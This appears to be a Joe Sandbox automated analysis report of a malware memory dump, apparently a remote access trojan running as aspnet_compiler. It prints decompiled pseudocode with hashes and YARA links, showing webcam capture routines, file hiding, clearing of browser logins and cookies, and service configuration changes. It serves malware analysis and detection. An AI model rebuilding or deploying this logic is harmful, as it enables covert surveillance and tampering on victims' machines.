                • Instruction Fuzzy Hash: BE815B72600B02ABE7249F79CC42B6B73A9AF58328F24552FF411D7381E7B8DD418B58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404351 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00404351(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
				char _v4;
				void* _v36;
				char _v40;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __esi;
				void* _t24;
				char** _t26;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t46;
				signed int _t55;
				signed int _t57;
				char* _t60;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				void* _t139;
				signed int _t140;
				char* _t142;
				signed int _t144;
				void* _t147;
				void* _t148;
				intOrPtr* _t149;

				_push(__edi);
				_t122 = _a8;
				_t127 = __ecx;
				_t24 = E0040278C(__ecx, _a8);
				_t78 = _t127;
				_t156 = _t24;
				if(_t24 == 0) {
					_push(__ebx);
					E00402868(_t78, __edx, _t139, 0);
					_t26 = E0040221D();
					_t75 = _a8;
					_a4 = _t26;
					_t117 =  *_t26;
					__eflags =  !_t117 - _t75;
					if( !_t117 <= _t75) {
						E00402884(_t127, _t139);
						asm("int3");
						_t140 = _t144;
						_push(_t127);
						_t28 = E00401F8B( &_v4);
						E00404182( &_v4,  &_v40, 4, 0xffffffff);
						_t147 = (_t144 & 0xfffffff8) - 0xc;
						E004020D6(_t75, _t147, _t117, __eflags, 0x472ec8);
						_t148 = _t147 - 0x18;
						E004020D6(_t75, _t148, _t117, __eflags,  &_v56);
						E0041A976( &_v72, _t117);
						_t149 = _t148 + 0x30;
						_t129 =  *_t28 - 0x3c;
						__eflags = _t129;
						if(__eflags == 0) {
							E00401E45( &_v48, _t117, _t140, __eflags, 0);
							_t36 = E0040245C();
							E00401F8B(E00401E45( &_v52, _t117, _t140, __eflags, 0));
							_t117 = _t36;
							_t131 = E00411235();
							__eflags = _t131;
							if(_t131 != 0) {
								 *0x470ad4 = E004114AA(_t131, "OpenCamera");
								 *0x470ad0 = E004114AA(_t131, "CloseCamera");
								_t46 = E004114AA(_t131, "GetFrame");
								_t117 = "FreeFrame";
								 *0x470ad8 = _t46;
								 *0x470acc = E004114AA(_t131, "FreeFrame");
								 *0x470aba = 1;
								E004020D6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x472e30);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t133 = _t129 - 1;
							__eflags = _t133;
							if(_t133 == 0) {
								__eflags =  *0x470a87;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t134 = _t133 - 1;
								__eflags = _t134;
								if(_t134 == 0) {
									 *0x470ad0();
									 *0x470a87 = 0;
								} else {
									_t135 = _t134 - 1;
									__eflags = _t135;
									if(_t135 == 0) {
										_t55 =  *0x470ad4();
										 *0x470a87 = _t55;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t117 = E0043A3AC(_t50, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, 0)));
											E004045E7(_a8, _t52, __eflags);
										}
									} else {
										_t136 = _t135 - 1;
										__eflags = _t136;
										if(_t136 == 0) {
											_t57 =  *0x470ad4();
											 *0x470a87 = _t57;
											__eflags = _t57;
											if(__eflags == 0) {
												L15:
												E004020D6(_t75, _t149 - 0x18, _t117, __eflags, 0x472e30);
												_push(0x41);
												L23:
												E00404A81(_a8, _t117, __eflags);
											} else {
												_t60 = E0043A3AC(_t58, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, _t136)));
												 *_t149 = 0x3e8;
												Sleep(??);
												_t117 = _t60;
												E004045E7(_a8, _t60, __eflags);
												 *0x470ad0();
											}
										}
									}
								}
							}
						}
						_t21 =  &_v48; // 0x472e30
						E00401E6D(_t21, _t117);
						E00401FB8();
						E00401FB8();
						__eflags = 0;
						return 0;
					} else {
						_push(_t139);
						_t142 =  &(_t117[_t75]);
						__eflags = _t75;
						if(_t75 != 0) {
							_t64 = E004027C6(_t75, _t127, _t117, _t122, _t142, 0);
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = E0040220A(_t127);
								E004015A6(E0040220A(_t127) + _t75 * 2, _t66,  *_a8);
								E00401592(E0040220A(_t127), _t122, _t75);
								E00402837(_t142);
							}
						}
						_t63 = _t127;
						goto L7;
					}
				} else {
					_push(_a12);
					_t63 = E004034C6(__ebx, _t127, __edx, _t122 - E0040220A(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E0040220A(_t78) >> 1);
					L7:
					return _t63;
				}
			}






































                0x00404352
                0x00404353
                0x00404357
                0x0040435a
                0x0040435f
                0x00404361
                0x00404363
                0x0040437e
                0x00404381
                0x00404388
                0x0040438d
                0x00404391
                0x00404395
                0x0040439b
                0x0040439d
                0x004043fb
                0x00404400
                0x00404402
                0x0040440d
                0x0040440e
                0x00404421
                0x00404426
                0x00404430
                0x00404435
                0x0040443f
                0x00404448
                0x0040444d
                0x00404450
                0x00404450
                0x00404453
                0x00404533
                0x0040453a
                0x0040454e
                0x00404553
                0x0040455c
                0x0040455e
                0x00404560
                0x00404573
                0x00404584
                0x0040458b
                0x00404590
                0x00404595
                0x004045a4
                0x004045ab
                0x004045b7
                0x004045bc
                0x00000000
                0x004045bc
                0x00404459
                0x00404459
                0x00404459
                0x0040445c
                0x004044f8
                0x004044ff
                0x00000000
                0x00000000
                0x00404462
                0x00404462
                0x00404462
                0x00404465
                0x004044e6
                0x004044ec
                0x00404467
                0x00404467
                0x00404467
                0x0040446a
                0x004044d5
                0x004044db
                0x004044e0
                0x004044e2
                0x00000000
                0x004044e4
                0x00404505
                0x00404521
                0x00404523
                0x00404523
                0x0040446c
                0x0040446c
                0x0040446c
                0x0040446f
                0x00404475
                0x0040447b
                0x00404480
                0x00404482
                0x004044bf
                0x004044c9
                0x004044ce
                0x004045be
                0x004045c1
                0x00404484
                0x00404496
                0x0040449d
                0x004044a4
                0x004044ad
                0x004044af
                0x004044b4
                0x004044b4
                0x00404482
                0x0040446f
                0x0040446a
                0x00404465
                0x0040445c
                0x004045c6
                0x004045ca
                0x004045d3
                0x004045db
                0x004045e0
                0x004045e6
                0x0040439f
                0x0040439f
                0x004043a0
                0x004043a3
                0x004043a5
                0x004043ac
                0x004043b1
                0x004043b3
                0x004043bd
                0x004043ce
                0x004043e0
                0x004043eb
                0x004043eb
                0x004043b3
                0x004043f1
                0x00000000
                0x004043f3
                0x00404365
                0x00404365
                0x00404377
                0x004043f4
                0x004043f6
                0x004043f6

                APIs
                  • Part of subcall function 00402884: std::_Xinvalid_argument.LIBCPMT ref: 00402889
                • Sleep.KERNEL32(00000000,0040C76B), ref: 004044A4
                  • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: H_prologSleepXinvalid_argumentstd::_
                • String ID: 0.G$CloseCamera$FreeFrame$GetFrame$OpenCamera
                • API String ID: 834325642-106669708
                • Opcode ID: 72b5cf57360f8c7f7f9965ee022148322bdef0c3ee28f50ca2ace154a928cca6
                • Instruction ID: ecedd063232be1ac5acd44a52b85944b2f12cafd62aea4fc44177e9967f66efd
                • Opcode Fuzzy Hash: 72b5cf57360f8c7f7f9965ee022148322bdef0c3ee28f50ca2ace154a928cca6
                • Instruction Fuzzy Hash: 6E51E571A04300ABC614FB769D5AA6E37959BD0714F00453FFA0A772E2DF7C8A45839E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004441FA Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 80%
                			E004441FA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E0043F7BD( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E004443F4(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E00445002(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E0043F7BD(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E0044357C(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E0043A5E8();
							asm("int3");
							E00433700(0x46c970, 0x1c);
							_t130 = _a4;
							_t75 = E004441FA(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00446A95(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0043FEEB( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E00444A38(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0043FEEB( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E00444189(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E00445002( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46f9a4 & 0x00000001;
												if(( *0x46f9a4 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E00445002( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E004443EB();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E00445002(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E0043A5E8();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E00433746();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0044357C(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}


































                0x004441fa
                0x004441fa
                0x004441ff
                0x00444204
                0x00444214
                0x00444215
                0x0044421e
                0x00444226
                0x0044422b
                0x0044422e
                0x00444230
                0x0044423c
                0x00444246
                0x00444249
                0x0044424a
                0x0044424c
                0x0044427d
                0x0044427e
                0x00444284
                0x00000000
                0x0044424e
                0x00444258
                0x0044425d
                0x00444260
                0x00444262
                0x0044427b
                0x00000000
                0x00444264
                0x00444264
                0x00444267
                0x00000000
                0x00444269
                0x00444269
                0x0044426c
                0x00000000
                0x0044426e
                0x00000000
                0x0044426e
                0x0044426c
                0x00444267
                0x00444262
                0x00444232
                0x00444232
                0x00444235
                0x0044428c
                0x0044428c
                0x0044428d
                0x0044428e
                0x0044428f
                0x00444291
                0x00444296
                0x0044429e
                0x004442a6
                0x004442aa
                0x004442b0
                0x004442b1
                0x004442b3
                0x004442b5
                0x004442be
                0x004442c3
                0x004442c9
                0x004442cc
                0x004442cf
                0x004442d4
                0x004442e3
                0x004442e8
                0x004442eb
                0x004442ed
                0x00444307
                0x00444314
                0x00444316
                0x00444318
                0x00000000
                0x0044431a
                0x0044431a
                0x0044431d
                0x00444320
                0x0044432b
                0x0044432e
                0x00444333
                0x00444336
                0x00444338
                0x0044435b
                0x0044435b
                0x00444360
                0x00444365
                0x00444366
                0x0044436a
                0x00444370
                0x00444373
                0x00444375
                0x00444379
                0x0044437d
                0x00444383
                0x00444388
                0x00444389
                0x0044438e
                0x0044438e
                0x0044438e
                0x0044437d
                0x00444391
                0x00444394
                0x0044439b
                0x0044439d
                0x004443a4
                0x004443aa
                0x004443ac
                0x004443ae
                0x004443b2
                0x004443b3
                0x004443b9
                0x004443bf
                0x004443bf
                0x004443bf
                0x004443bf
                0x004443b3
                0x004443ac
                0x004443a4
                0x004443c7
                0x004443c9
                0x004443d0
                0x004443d4
                0x004443db
                0x0044433a
                0x0044433a
                0x0044433d
                0x00444344
                0x00444344
                0x00444345
                0x00444346
                0x00444347
                0x00444348
                0x00000000
                0x0044433f
                0x0044433f
                0x00444342
                0x0044434b
                0x0044434d
                0x00000000
                0x0044434f
                0x00444350
                0x00000000
                0x00444355
                0x00000000
                0x00000000
                0x00000000
                0x00444342
                0x0044433d
                0x00444338
                0x004442ef
                0x004442ef
                0x004442f2
                0x004442f9
                0x004442f9
                0x004442fa
                0x004442fb
                0x004442fc
                0x004442fd
                0x004442fe
                0x004442fe
                0x004442f4
                0x004442f4
                0x004442f7
                0x00000000
                0x00000000
                0x004442f7
                0x00444303
                0x00444305
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00444305
                0x004442b7
                0x004442b7
                0x004442b7
                0x004443e7
                0x00444237
                0x00444237
                0x0044423a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044423a
                0x00444235
                0x00444206
                0x0044420b
                0x00444288
                0x0044428b
                0x0044428b

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe
                • String ID:
                • API String ID: 4189289331-0
                • Opcode ID: bea48539c97404502ca8d342fb423c1747bb2e34920bcab85dac5bef24bcc09a
                • Instruction ID: 8fe28a21c22037a225050a123006aa5e814484bf9f3f78946cda57ab9d9a3774
                • Opcode Fuzzy Hash: bea48539c97404502ca8d342fb423c1747bb2e34920bcab85dac5bef24bcc09a
                • Instruction Fuzzy Hash: 2451EE72900505A7FF249F99CC42FAF77A8AF89774F20425FF81496292DB3DD900866C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409C99 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00409C99(void* __ecx, long __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1148;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t32;
				char* _t34;
				void* _t36;
				int _t40;
				void* _t47;
				int _t62;
				void* _t64;
				WCHAR* _t70;
				void* _t71;
				void* _t79;
				void* _t134;
				signed int _t136;
				signed int _t139;

				_t126 = __edx;
				_t139 = _t136 & 0xfffffff8;
				_t79 = __ecx;
				_push(_t130);
				_t134 = __ecx + 4;
				do {
					Sleep(0x1388);
					E00409BE8(_t79, _t126);
					_t126 = 0x46a8f0;
					if(E00406E2B(_t139) != 0) {
						if(E0040619C() == 0) {
							CreateDirectoryW(E00401EE4(0x4730b8), 0);
						}
						_t128 = _t79 + 0x60;
						_t32 = GetFileAttributesW(E00401EE4(_t79 + 0x60));
						_t142 = _t32 & 0x00000002;
						if((_t32 & 0x00000002) != 0) {
							SetFileAttributesW(E00401EE4(_t128), 0x80);
						}
						_t34 = E00401F8B(E00401E45(0x473298, _t126, _t134, _t142, 0x12));
						_t143 =  *_t34;
						if( *_t34 != 0) {
							E004020BF(_t79,  &_v1124);
							_t36 = E0040245C();
							E0040632B( &_v1028, E00401F8B(0x473280), _t36);
							_t40 = PathFileExistsW(E00401EE4(_t128));
							__eflags = _t40;
							if(_t40 != 0) {
								E004020BF(_t79,  &_v1100);
								E00401EE4(_t128);
								_t126 =  &_v1100;
								_t62 = E0041ADFE( &_v1100);
								__eflags = _t62;
								if(_t62 != 0) {
									_t64 = E0040245C();
									E00401FC2( &_v1136,  &_v1100, _t130, E0040644C(_t79,  &_v1028,  &_v1100,  &_v1076, E00401F8B( &_v1100), _t64));
									E00401FB8();
								}
								E00401FB8();
							}
							__eflags = E0040245C() + _t41;
							L00403356(E00402097(_t79,  &_v1076, _t126, _t134, __eflags, E00401EE4(_t134), E0040245C() + _t41));
							E00401FB8();
							_t47 = E0040245C();
							E0040644C(_t79,  &_v1040, _t126,  &_v1064, E00401F8B( &_v1136), _t47);
							_t126 = E00401EE4(_t128);
							E0041AE6B( &_v1076, _t51);
							E00401FB8();
							E00401FB8();
						} else {
							_t70 = E00401EE4(_t128);
							_t71 = E0040245C();
							_t132 = _t71;
							_t130 = _t71 + _t132;
							E00401EE4(_t134);
							_t126 = _t71 + _t132;
							E0041AD6A(_t71 + _t132, _t70, 1);
						}
						L004086CB(_t79, _t134, _t126, 0x46a8f0);
						if( *((char*)(E00401F8B(E00401E45(0x473298, _t126, _t134, _t143, 0x13)))) != 0) {
							SetFileAttributesW(E00401EE4(_t128), 6);
						}
					}
				} while ( *((char*)(_t79 + 0x49)) != 0);
				return 0;
			}






























                0x00409c99
                0x00409c9c
                0x00409ca7
                0x00409ca9
                0x00409cab
                0x00409cae
                0x00409cb3
                0x00409cbb
                0x00409cc0
                0x00409cce
                0x00409ce0
                0x00409cef
                0x00409cef
                0x00409cf5
                0x00409d00
                0x00409d06
                0x00409d08
                0x00409d17
                0x00409d17
                0x00409d2b
                0x00409d30
                0x00409d33
                0x00409d65
                0x00409d6f
                0x00409d84
                0x00409d91
                0x00409d97
                0x00409d99
                0x00409d9f
                0x00409da6
                0x00409dab
                0x00409db1
                0x00409db6
                0x00409db8
                0x00409dbe
                0x00409de1
                0x00409dea
                0x00409dea
                0x00409df3
                0x00409df3
                0x00409dff
                0x00409e18
                0x00409e21
                0x00409e2a
                0x00409e43
                0x00409e4f
                0x00409e55
                0x00409e5e
                0x00409e67
                0x00409d35
                0x00409d39
                0x00409d41
                0x00409d46
                0x00409d4a
                0x00409d4c
                0x00409d51
                0x00409d55
                0x00409d5b
                0x00409e73
                0x00409e8e
                0x00409e9a
                0x00409e9a
                0x00409e8e
                0x00409ea0
                0x00409eb3

                APIs
                • Sleep.KERNEL32(00001388), ref: 00409CB3
                  • Part of subcall function 00409BE8: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                  • Part of subcall function 00409BE8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                  • Part of subcall function 00409BE8: Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                  • Part of subcall function 00409BE8: CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409CEF
                • GetFileAttributesW.KERNEL32(00000000), ref: 00409D00
                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409D17
                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409D91
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046A8F0,?,00000000,00000000,00000000,00000000,00000000), ref: 00409E9A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                • String ID:
                • API String ID: 3795512280-0
                • Opcode ID: 5be445e5ea5054b0e1cd6de02bbe9d8e67b77a22bdc24bd22d610c221810c8ca
                • Instruction ID: a26b43d943647d041280ad137afe2d2b6888429955654135db8bde193f98b3d7
                • Opcode Fuzzy Hash: 5be445e5ea5054b0e1cd6de02bbe9d8e67b77a22bdc24bd22d610c221810c8ca
                • Instruction Fuzzy Hash: 35514D312043015BC714BB72D8A6ABF779A9F80308F04453FB946B72E3DE7D9D05869A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B586 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 103sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E0040B586(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				void* _t53;
				signed int _t54;
				signed int _t55;
				void* _t56;

				_t52 = __edi;
				_t55 = _t54 & 0xfffffff8;
				 *0x470b1a = 1;
				Sleep( *0x470b28);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t60 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040B463(_t60);
						}
						_t61 = _t36;
						if(_t36 == 0) {
							_t36 = E0040B2B1(_t50, _t52, _t61);
						}
						_t62 = _v6;
						if(_v6 == 0) {
							_v6 = E0040B0AA(_t36, _t50, _t52, _t62);
						}
						_t63 = _v7;
						if(_v7 == 0) {
							_v7 = E0040B01B(_t50, _t52, _t63);
						}
						_t50 = _v5;
						_t64 = _t50;
						if(_t50 == 0) {
							_t50 = E0040AF8C(_t50, _t52, _t64);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t74 = _t40;
				} while (_t40 == 0);
				_t56 = _t55 - 0x18;
				E00402073(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
				E0040B752(_t36, _t50, _t53, _t74);
				E00402073(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
				_t57 = _t56 - 0x18;
				E00402073(_t36, _t56 - 0x18, _t50, _t53, "i");
				E0041A04A(_t36, _t52);
				E00402073(_t36, _t57 + 0x18, _t50, _t53, 0x464074);
				_push(0xaf);
				E00404A81(0x4734e8, _t50, _t74);
				if( *0x470b19 != 0) {
					E00412B5F(0x473238, E00401F8B(0x473238), "FR", 1);
				}
				 *0x470b1a = 0;
				return 0;
			}


















                0x0040b586
                0x0040b589
                0x0040b594
                0x0040b59b
                0x0040b5a7
                0x0040b5ab
                0x0040b5ad
                0x0040b5b3
                0x0040b5b3
                0x0040b5b7
                0x0040b5b7
                0x0040b5b7
                0x0040b5b7
                0x0040b5b9
                0x0040b5bb
                0x0040b5c0
                0x0040b5c0
                0x0040b5c2
                0x0040b5c4
                0x0040b5cb
                0x0040b5cb
                0x0040b5d1
                0x0040b5d3
                0x0040b5da
                0x0040b5da
                0x0040b5e2
                0x0040b5e4
                0x0040b5eb
                0x0040b5eb
                0x0040b5ef
                0x0040b5f3
                0x0040b5f5
                0x0040b5fc
                0x0040b5fe
                0x0040b5fe
                0x0040b604
                0x0040b61e
                0x0040b623
                0x0040b629
                0x0040b62d
                0x0040b631
                0x0040b60a
                0x0040b60a
                0x0040b610
                0x00000000
                0x0040b616
                0x0040b616
                0x0040b61c
                0x00000000
                0x00000000
                0x0040b61c
                0x0040b610
                0x0040b637
                0x00000000
                0x00000000
                0x0040b639
                0x0040b651
                0x0040b651
                0x0040b659
                0x0040b663
                0x0040b668
                0x0040b674
                0x0040b679
                0x0040b683
                0x0040b688
                0x0040b697
                0x0040b69c
                0x0040b6a6
                0x0040b6b2
                0x0040b6c7
                0x0040b6cd
                0x0040b6ce
                0x0040b6db

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: [Cleared browsers logins and cookies.]$82G$Cleared browsers logins and cookies.$4G
                • API String ID: 3472027048-2766125209
                • Opcode ID: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                • Instruction ID: b4021fb9e4edc30202d34e01d01bd8d1c2d2826e69326faececa9b35d7d9af25
                • Opcode Fuzzy Hash: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                • Instruction Fuzzy Hash: D831860474C3806DDA116B7558667AB6F928EA3758F0844FFB8C4273C3DA7B490993AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004197D3 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E004197D3(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t24 =  &_a4;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00401EE4(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00401EE9();
				return _t21;
			}












                0x004197d6
                0x004197dc
                0x004197de
                0x004197e3
                0x004197eb
                0x004197ee
                0x004197fd
                0x00419801
                0x00419810
                0x00419813
                0x00419815
                0x00419829
                0x00000000
                0x00419817
                0x00419817
                0x0041981a
                0x00419825
                0x00000000
                0x0041981c
                0x0041981f
                0x00419821
                0x0041982b
                0x0041982b
                0x0041982b
                0x0041981f
                0x0041981a
                0x00419848
                0x0041984b
                0x0041984e
